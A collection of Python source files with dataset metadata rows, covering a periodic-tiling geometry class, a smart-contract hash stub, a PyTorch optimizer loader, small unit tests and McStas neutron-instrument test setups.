TiledDistance = np.linalg.norm(P1Tiled - P0)
if TiledDistance < result:
result = TiledDistance
return result
def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
"""Create a larger Design by tiling a smaller one.
Args:
D (Design): A smaller Design to tile.
nTiles (int/numpy.ndarray): A specifier for number of
tiles to replicate in periodic directions.
OldToNewIndices (dict<int,list<int>>): Optional, a
dictionary to store the mapping of tiled points
indices from the smaller Design to the larger.
(Default value = None)
AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
Optional, a mapping of locations to properties.
NOTE: It is modified in place, so make a copy before.
(Default value = None)
Returns:
(Design): A larger, periodic Design
"""
if isinstance(nTiles, int):
nTiles = np.array([nTiles] * 2, dtype=int)
if OldToNewIndices is None and AuxPropMap is not None:
OldToNewIndices = {}
if OldToNewIndices is not None:
OldToNewIndices.clear()
for i in range(len(D)):
OldToNewIndices[i] = []
result = Design()
for nx in range(nTiles[0]):
for ny in range(nTiles[1]):
Offset = nx * self.Vx + ny * self.Vy
for i, P in enumerate(D.Canvas.Points):
j = len(result)
result.add(P + Offset, D.Contents[i])
if OldToNewIndices is not None:
OldToNewIndices[i].append(j)
if AuxPropMap is not None:
for AuxProp in AuxPropMap:
for i in OldToNewIndices:
for j in OldToNewIndices[i]:
AuxPropMap[AuxProp][j] = AuxPropMap[AuxProp][i]
return result
# === BASIC QUERY METHODS
@property
def TileShape(self):
""" """
return self._TileShape
@property
def TilingDirections(self):
""" """
return self._TilingDirections
@property
def Vx(self):
""" """
return self._TilingDirections[2]
@property
def Vy(self):
""" """
return self._TilingDirections[3]
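`getDistance` above minimizes over an explicit list of neighbor translations; for an orthorhombic (axis-aligned) cell the same minimum-image distance has a closed form. A standalone numpy sketch, not part of this module, with a per-axis periodicity mask mirroring PlanarTiling's tiling in x and y only:

```python
import numpy as np

def min_image_distance(p0, p1, box_lengths, periodic=(True, True, False)):
    """Minimum-image distance with per-axis periodicity.

    Each periodic displacement component is shifted by a whole number of
    box lengths so it lands in [-L/2, L/2); aperiodic components are
    left untouched.
    """
    d = np.asarray(p1, dtype=float) - np.asarray(p0, dtype=float)
    L = np.asarray(box_lengths, dtype=float)
    mask = np.asarray(periodic)
    d[mask] -= L[mask] * np.round(d[mask] / L[mask])
    return float(np.linalg.norm(d))

dist = min_image_distance([0.2, 0.2, 0.0], [9.9, 0.2, 0.0], [10.0, 10.0, 10.0])
```

The loop over `TilingDirections` generalizes this to skewed cells, where the closed form above no longer applies directly.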
class CubicTiling(Tiling):
""" """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, Parallelepiped_):
super().__init__()
self._TileShape = Parallelepiped_
self._TilingDirections = []
self._TilingDirections.append(-Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx)
self._TilingDirections.append(-Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx)
self._TilingDirections.append(Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy + Parallelepiped_.Vz)
# === CONSTRUCTOR - From POSCAR file
@classmethod
def fromPOSCAR(cls, filename):
"""
Args:
filename:
Returns:
"""
return cls(Parallelepiped.fromPOSCAR(filename))
# === PROPERTY EVALUATION METHODS
def transformInsideTile(self, P, EdgeTol=DBL_TOL):
"""
Args:
P: param EdgeTol: (Default value = DBL_TOL)
EdgeTol: (Default value = DBL_TOL)
Returns:
"""
def _isInsideAndNotOnPosEdge(P, EdgeTol=EdgeTol):
return (self.TileShape.isInShape(P) and
self.TileShape.satisfiesFacet(P, 2, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 3, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 4, -EdgeTol))
if _isInsideAndNotOnPosEdge(P):
return True # Do not transform P, return True
NegCorner = self.TileShape.V[0]
PosCorner = self.TileShape.V[7]
Nx = self.TileShape.FacetNorms[3]
Ny = self.TileShape.FacetNorms[2]
Nz = self.TileShape.FacetNorms[4]
while np.inner(P - NegCorner, -Nx) > CubicTiling.DBL_TOL:
P += self.TileShape.Vx
while np.inner(P - PosCorner, Nx) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vx
while np.inner(P - NegCorner, -Ny) > CubicTiling.DBL_TOL:
P += self.TileShape.Vy
while np.inner(P - PosCorner, Ny) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vy
while np.inner(P - NegCorner, -Nz) > CubicTiling.DBL_TOL:
P += self.TileShape.Vz
while np.inner(P - PosCorner, Nz) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vz
assert (_isInsideAndNotOnPosEdge(P))
return True
def getFractionalCoords(self, P, blnRelativeToCenter=False, blnRoundInside=True, blnPreferZero=True):
"""
Args:
P: param blnRelativeToCenter: (Default value = False)
blnRoundInside: Default value = True)
blnPreferZero: Default value = True)
blnRelativeToCenter: (Default value = False)
Returns:
"""
# NOTE: The option blnRoundInside is just a way to round numbers close
# to the bounds (0,1) so that they never result in values outside
# of that range. Some programs (like AtomEye?) are not robust
# enough to handle small negative numbers or values greater than 1
# in these cases.
Pfrac = self.TileShape.getFractionalCoords(P, blnRelativeToCenter=blnRelativeToCenter)
Pfrac -= Pfrac.astype(int)
if blnRoundInside:
if blnPreferZero:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
else:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 1.0
return Pfrac
    def getDistance(self, P0, P1):
        """Return the minimum-image distance between two points.

        Args:
            P0: The first point.
            P1: The second point.

        Returns:
            float: The shortest distance between P0 and any periodic image of P1.
        """
        result = np.linalg.norm(P1 - P0)
        for TilingDirection in self.TilingDirections:
            P1Tiled = P1 + TilingDirection
            TiledDistance = np.linalg.norm(P1Tiled - P0)
            if TiledDistance < result:
                result = TiledDistance
        return result
    def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
        """Create a larger Design by tiling a smaller one.

        Args:
            D (Design): A smaller Design to tile.
            nTiles (int/numpy.ndarray): A specifier for number of
                tiles to replicate in periodic directions.
            OldToNewIndices (dict<int,list<int>>): Optional, a
                dictionary to store the mapping of tiled point
                indices from the smaller Design to the larger.
                (Default value = None)
            AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
                Optional, a mapping of locations to properties.
                NOTE: It is modified in place, so make a copy before.
                (Default value = None)

        Returns:
            (Design): A larger, periodic Design
        """
        if isinstance(nTiles, int):
            nTiles = np.array([nTiles] * 3, dtype=int)
        if OldToNewIndices is None and AuxPropMap is not None:
            OldToNewIndices = {}
        if OldToNewIndices is not None:
            OldToNewIndices.clear()
            for i in range(len(D)):
                OldToNewIndices[i] = []
        result = Design()
        for nx in range(nTiles[0]):
            for ny in range(nTiles[1]):
                for nz in range(nTiles[2]):
                    Offset = nx * self.Vx + ny * self.Vy + nz * self.Vz
                    for i, P in enumerate(D.Canvas.Points):
                        j = len(result)
                        result.add(P + Offset, D.Contents[i])
                        if OldToNewIndices is not None:
                            OldToNewIndices[i].append(j)
        if AuxPropMap is not None:
            for AuxProp in AuxPropMap:
                for i in OldToNewIndices:
                    for j in OldToNewIndices[i]:
                        AuxPropMap[AuxProp][j] = AuxPropMap[AuxProp][i]
        return result
    # === BASIC QUERY METHODS
    @property
    def TileShape(self):
        """ """
        return self._TileShape

    @property
    def TilingDirections(self):
        """ """
        return self._TilingDirections

    @property
    def Vx(self):
        """ """
        return self._TilingDirections[11]

    @property
    def Vy(self):
        """ """
        return self._TilingDirections[12]

    @property
    def Vz(self):
        """ """
        return self._TilingDirections[0]
| 37.453988 | 136 | 0.605569 | 1,897 | 18,315 | 5.746969 | 0.137586 | 0.089892 | 0.081086 | 0.124748 | 0.868281 | 0.85122 | 0.835535 | 0.82361 | 0.799395 | 0.795817 | 0 | 0.009204 | 0.294076 | 18,315 | 488 | 137 | 37.530738 | 0.834017 | 0.251979 | 0 | 0.717647 | 0 | 0 | 0.009628 | 0 | 0 | 0 | 0 | 0 | 0.015686 | 1 | 0.129412 | false | 0.003922 | 0.015686 | 0.023529 | 0.286275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
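The getDistance method above implements a minimum-image convention: the reported distance is the shortest one over all periodic images of the second point. A standalone pure-Python sketch of the same idea for an axis-aligned orthorhombic cell (independent of the TileShape machinery; the function name and cell representation are illustrative, and only nearest images are considered):

```python
import itertools
import math

def min_image_distance(p0, p1, cell):
    # Shortest distance between p0 and any periodic image of p1,
    # for an axis-aligned periodic cell with edge lengths `cell`.
    best = math.dist(p0, p1)
    # Try the 27 nearest images of p1 (shifts of -1, 0, +1 cells per axis).
    for shift in itertools.product((-1, 0, 1), repeat=3):
        image = [c + s * l for c, s, l in zip(p1, shift, cell)]
        best = min(best, math.dist(p0, image))
    return best
```

Like the method above, this takes the minimum over candidate images rather than wrapping coordinates, so it also works for points sitting exactly on a boundary.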
7e1e9b15df1775872e3cfe1a89607aa8a7e6344e | 375 | py | Python | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 79 | 2017-10-22T03:35:06.000Z | 2021-12-02T10:28:06.000Z | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 122 | 2017-10-19T12:34:08.000Z | 2020-08-20T12:38:17.000Z | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 76 | 2017-10-19T05:09:55.000Z | 2020-12-08T12:03:59.000Z |
class SmartContract:

    def Sha1(data):
        """
        :param data: data to hash with SHA-1
        """
        pass

    def Sha256(data):
        """
        :param data: data to hash with SHA-256
        """
        pass

    def Hash160(data):
        """
        :param data: data to hash
        """
        pass

    def Hash256(data):
        """
        :param data: data to hash
        """
        pass

    def VerifySignature(pubkey, signature):
        """
        :param pubkey: public key to verify against
        :param signature: signature to verify
        """
        pass
| 11.029412 | 43 | 0.365333 | 25 | 375 | 5.48 | 0.52 | 0.233577 | 0.321168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053763 | 0.504 | 375 | 33 | 44 | 11.363636 | 0.682796 | 0.045333 | 0 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0.454545 | 0 | 0 | 0.545455 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
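The stubs above only declare the interop surface; the real bodies are supplied by the NEO VM at runtime. Off-chain, the plain digests can be reproduced with the standard library — a sketch, assuming the common convention that Hash256 denotes a double SHA-256 (an assumption here, not something the stubs state):

```python
import hashlib

def sha256(data):
    # Plain SHA-256 digest, the off-chain counterpart of SmartContract.Sha256.
    return hashlib.sha256(data).digest()

def hash256(data):
    # Double SHA-256 (assumed meaning of Hash256 in this interop layer).
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()
```

Both return 32-byte digests, which is what on-chain script hashes and transaction hashes are built from.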
7e4f030d71fae15cfa3baca6decb8a25b1ba8dfe | 5,314 | py | Python | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | from monk.pytorch.optimizers.imports import *
from monk.system.imports import *


@accepts(dict, post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def load_optimizer(system_dict):
    '''
    Load Optimizers in training states

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables

    Returns:
        dict: updated system dict
    '''
    optimizer = system_dict["local"]["optimizer"];
    learning_rate = system_dict["hyper-parameters"]["learning_rate"];
    if(optimizer == "sgd"):
        system_dict["local"]["optimizer"] = torch.optim.SGD(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
            dampening=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            nesterov=False);
    elif(optimizer == "nesterov_sgd"):
        # The Nesterov variant must enable the flag; note PyTorch requires
        # momentum > 0 and zero dampening when nesterov=True.
        system_dict["local"]["optimizer"] = torch.optim.SGD(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
            dampening=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            nesterov=True);
    elif(optimizer == "rmsprop"):
        system_dict["local"]["optimizer"] = torch.optim.RMSprop(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            alpha=system_dict["hyper-parameters"]["optimizer"]["params"]["decay_rate"],
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            momentum=0.0,
            centered=False);
    elif(optimizer == "momentum_rmsprop"):
        system_dict["local"]["optimizer"] = torch.optim.RMSprop(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            alpha=system_dict["hyper-parameters"]["optimizer"]["params"]["decay_rate"],
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
            centered=True);
    elif(optimizer == "adam"):
        system_dict["local"]["optimizer"] = torch.optim.Adam(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            amsgrad=system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"]);
    elif(optimizer == "adamax"):
        system_dict["local"]["optimizer"] = torch.optim.Adamax(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"]);
    elif(optimizer == "adamw"):
        system_dict["local"]["optimizer"] = torch.optim.AdamW(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            amsgrad=system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"]);
    elif(optimizer == "adadelta"):
        system_dict["local"]["optimizer"] = torch.optim.Adadelta(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            rho=system_dict["hyper-parameters"]["optimizer"]["params"]["rho"],
            eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"]);
    elif(optimizer == "adagrad"):
        system_dict["local"]["optimizer"] = torch.optim.Adagrad(
            system_dict["local"]["params_to_update"],
            lr=learning_rate,
            lr_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["lr_decay"],
            weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
            initial_accumulator_value=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"]);
return system_dict; | 50.609524 | 151 | 0.625329 | 539 | 5,314 | 5.944341 | 0.12987 | 0.177903 | 0.159176 | 0.265293 | 0.825218 | 0.825218 | 0.759675 | 0.730961 | 0.71598 | 0.689139 | 0 | 0.001861 | 0.191005 | 5,314 | 105 | 152 | 50.609524 | 0.743429 | 0.040459 | 0 | 0.653846 | 0 | 0 | 0.345501 | 0.009077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.025641 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
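The long if/elif chain above can be flattened into a table-driven dispatch. A sketch of that pattern with made-up entries (constructor names and kwargs here are illustrative, not monk's real parameter set), which also makes the sgd/nesterov_sgd distinction explicit:

```python
def build_optimizer_spec(name, lr):
    # Map optimizer names to (constructor name, fixed kwargs); the
    # entries are illustrative stand-ins for the torch.optim calls above.
    registry = {
        "sgd": ("SGD", {"lr": lr, "nesterov": False}),
        "nesterov_sgd": ("SGD", {"lr": lr, "nesterov": True}),
        "rmsprop": ("RMSprop", {"lr": lr, "centered": False}),
        "momentum_rmsprop": ("RMSprop", {"lr": lr, "centered": True}),
        "adam": ("Adam", {"lr": lr}),
    }
    if name not in registry:
        raise ValueError("unknown optimizer: %s" % name)
    return registry[name]
```

A single lookup replaces nine branches, and adding an optimizer becomes a one-line registry entry.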
7e6c468f3bbb4807c439e41136e12ce330382a7d | 128 | py | Python | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | null | null | null | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | 1 | 2019-03-15T14:45:46.000Z | 2019-03-15T14:45:46.000Z | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | 1 | 2021-08-28T11:18:33.000Z | 2021-08-28T11:18:33.000Z | # License MIT (https://opensource.org/licenses/MIT).
from . import test_send
from . import test_render
from . import test_fetch
| 25.6 | 52 | 0.773438 | 19 | 128 | 5.052632 | 0.631579 | 0.3125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 128 | 4 | 53 | 32 | 0.857143 | 0.390625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7e95711252e29be08a362b82e1fc03e9ef3f0085 | 1,506 | py | Python | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 85 | 2017-11-21T12:22:02.000Z | 2022-03-27T23:07:17.000Z | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 545 | 2017-11-04T14:15:04.000Z | 2022-03-27T14:19:27.000Z | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 45 | 2017-11-11T12:36:30.000Z | 2022-02-25T06:10:44.000Z |
import smart_imports

smart_imports.all()


class UrlsTests(utils_testcase.TestCase):

    def setUp(self):
        super(UrlsTests, self).setUp()

    def test_modify_url__no_query(self):
        self.assertEqual(utils_urls.modify_url('www.example.com', query=()), 'www.example.com')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/', query=()), 'http://www.example.com/')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z', query=()), 'http://www.example.com/?x=y&x=z')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z#abc=p&p=abc', query=()), 'http://www.example.com/?x=y&x=z#abc=p&p=abc')

    def test_modify_url(self):
        query = (('x', 123), ('test', 'bla-bla'), ('test', 'ма-ма'))
        self.assertEqual(utils_urls.modify_url('www.example.com', query=query), 'www.example.com?x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/', query=query), 'http://www.example.com/?x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z', query=query), 'http://www.example.com/?x=y&x=z&x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
        self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z#abc=p&p=abc', query=query),
                         'http://www.example.com/?x=y&x=z&x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0#abc=p&p=abc')
| 60.24 | 180 | 0.652722 | 263 | 1,506 | 3.638783 | 0.129278 | 0.167189 | 0.217346 | 0.213166 | 0.825496 | 0.816092 | 0.797283 | 0.787879 | 0.787879 | 0.765935 | 0 | 0.029213 | 0.113546 | 1,506 | 24 | 181 | 62.75 | 0.68764 | 0 | 0 | 0 | 0 | 0.411765 | 0.444518 | 0.043189 | 0 | 0 | 0 | 0 | 0.470588 | 1 | 0.176471 | false | 0 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
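The behaviour these tests pin down — appending query pairs while keeping any existing query string and the fragment intact — can be sketched with the standard library (a hypothetical re-implementation of the idea, not the_tale's actual utils_urls code):

```python
from urllib.parse import urlsplit, urlunsplit, urlencode

def modify_url(url, query=()):
    # Append the given (key, value) pairs after any existing query,
    # leaving the fragment untouched; urlencode percent-encodes UTF-8.
    scheme, netloc, path, old_query, fragment = urlsplit(url)
    extra = urlencode(list(query))
    new_query = "&".join(part for part in (old_query, extra) if part)
    return urlunsplit((scheme, netloc, path, new_query, fragment))
```

With `query=()` the URL round-trips unchanged, matching the no-query test case above.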
0e2ea3bc8e861e1df93948290edaaf2c87c368e2 | 179 | py | Python | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | 23 | 2019-02-17T17:49:28.000Z | 2021-12-02T01:20:58.000Z | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | null | null | null | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | 4 | 2019-02-17T16:39:46.000Z | 2021-12-02T01:21:36.000Z | from . import artifactory
from . import history
from . import model_utils
from . import numeric_utils
from . import tensor_utils
from . import training_utils
from . import visual
| 22.375 | 28 | 0.804469 | 25 | 179 | 5.6 | 0.4 | 0.5 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156425 | 179 | 7 | 29 | 25.571429 | 0.927152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0e99a42157e758091a8bc259b3fc1a67d63f7833 | 7,853 | py | Python | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 3 | 2019-08-29T14:15:06.000Z | 2021-03-04T12:08:48.000Z | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 37 | 2019-03-05T12:28:32.000Z | 2022-03-22T10:11:23.000Z | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 6 | 2019-10-21T20:19:10.000Z | 2022-03-09T10:12:16.000Z | import io
import os
import unittest.mock
from mcstasscript.interface import instr
def setup_simple_instrument():
    Instr = instr.McStas_instr("integration_test_simple")

    source = Instr.add_component("source", "Source_div")
    source.xwidth = 0.03
    source.yheight = 0.01
    source.focus_aw = 0.01
    source.focus_ah = 0.01
    source.E0 = 81.81
    source.dE = 1.0
    source.flux = 1E10

    PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
    PSD.set_AT([0, 0, 1], RELATIVE="source")
    PSD.xwidth = 0.1
    PSD.nx = 100
    PSD.yheight = 0.03
    PSD.filename = "\"PSD.dat\""
    PSD.restore_neutron = 1

    return Instr
def setup_simple_instrument_input_path():
    THIS_DIR = os.path.dirname(os.path.abspath(__file__))
    input_path = os.path.join(THIS_DIR, "test_input_folder")
    Instr = instr.McStas_instr("integration_test_simple_input",
                               input_path=input_path)

    source = Instr.add_component("source", "Source_div")
    source.xwidth = 0.03
    source.yheight = 0.01
    source.focus_aw = 0.01
    source.focus_ah = 0.01
    source.E0 = 81.81
    source.dE = 1.0
    source.flux = 1E10

    PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
    PSD.set_AT([0, 0, 1], RELATIVE="source")
    PSD.xwidth = 0.1
    PSD.nx = 100
    PSD.yheight = 0.03
    PSD.filename = "\"PSD.dat\""
    PSD.restore_neutron = 1

    return Instr
def setup_simple_slit_instrument():
    Instr = instr.McStas_instr("integration_test_simple")

    source = Instr.add_component("source", "Source_div")
    source.xwidth = 0.1
    source.yheight = 0.01
    source.focus_aw = 0.01
    source.focus_ah = 0.01
    source.E0 = 81.81
    source.dE = 1.0
    source.flux = 1E10

    Instr.add_parameter("slit_offset", value=0)

    Slit = Instr.add_component("slit", "Slit")
    Slit.set_AT(["slit_offset", 0, 0.5], RELATIVE="source")
    Slit.xwidth = 0.01
    Slit.yheight = 0.03

